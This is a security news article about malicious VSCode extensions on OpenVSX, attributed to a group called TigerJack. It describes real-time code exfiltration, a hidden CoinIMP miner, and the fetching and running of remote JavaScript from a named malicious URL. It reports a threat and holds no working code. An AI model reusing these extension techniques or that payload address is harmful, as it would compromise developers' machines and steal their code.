TigerJack Hackers Use Malicious VSCode Extensions for Real-Time Code Theft and Cryptojacking on OpenVSX

Several extensions for Visual Studio Code, distributed via the open OpenVSX repository, have been found to contain malicious code aimed at cryptocurrency theft and the compromise of developers’ machines. The campaign is attributed to a group known as TigerJack, which fabricates accounts and disguises its tools as legitimate plugins—complete with polished descriptions, GitHub repositories, and professional branding.

Two malicious extensions remain accessible on OpenVSX despite having been removed from Microsoft’s official marketplace after accumulating more than 17,000 downloads in total. The same plugins have subsequently reappeared in Visual Studio Code under new names, indicating a systematic, persistent attack. The malicious toolkit targets users of VS Code–compatible editors that do not rely on Microsoft’s store—platforms such as Cursor and Windsurf, for example.

Koi Security’s researchers discovered that the “C++ Playground” extension begins monitoring source edits immediately after installation, logging every change to C++ files via the onDidChangeTextDocument handler. At roughly half-second intervals it transmits the updated text to external servers, enabling attackers to exfiltrate code in real time.

Another plugin, “HTTP Format,” appears to function normally on the surface but clandestinely launches a CoinIMP mining payload. The miner uses hard-coded settings and credentials and imposes no resource limits—driving the CPU to full load to mine cryptocurrency illicitly.

A further class of malicious plugins—including cppplayground, httpformat, and pythonformat—periodically (every 20 minutes) fetch and execute JavaScript from a remote address (ab498.pythonanywhere.com/static/in4.js). This mechanism lets the attackers push arbitrary payloads dynamically without updating the extension itself.

That capability makes the threat particularly severe: beyond stealing keys and credentials, an attacker can deploy ransomware, plant backdoors inside projects, or use an infected developer workstation as a foothold into an organization’s internal network.

Koi Security assesses that TigerJack’s activity is a coordinated operation run through multiple accounts. Each malicious extension is published under a different author persona that purports to be a reputable developer; the profiles include public source code, detailed feature descriptions, and names that closely mimic genuine, popular tools.

The findings have been reported to OpenVSX administrators, but at the time of publication no response had been received and the malicious plugins remained publicly available.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy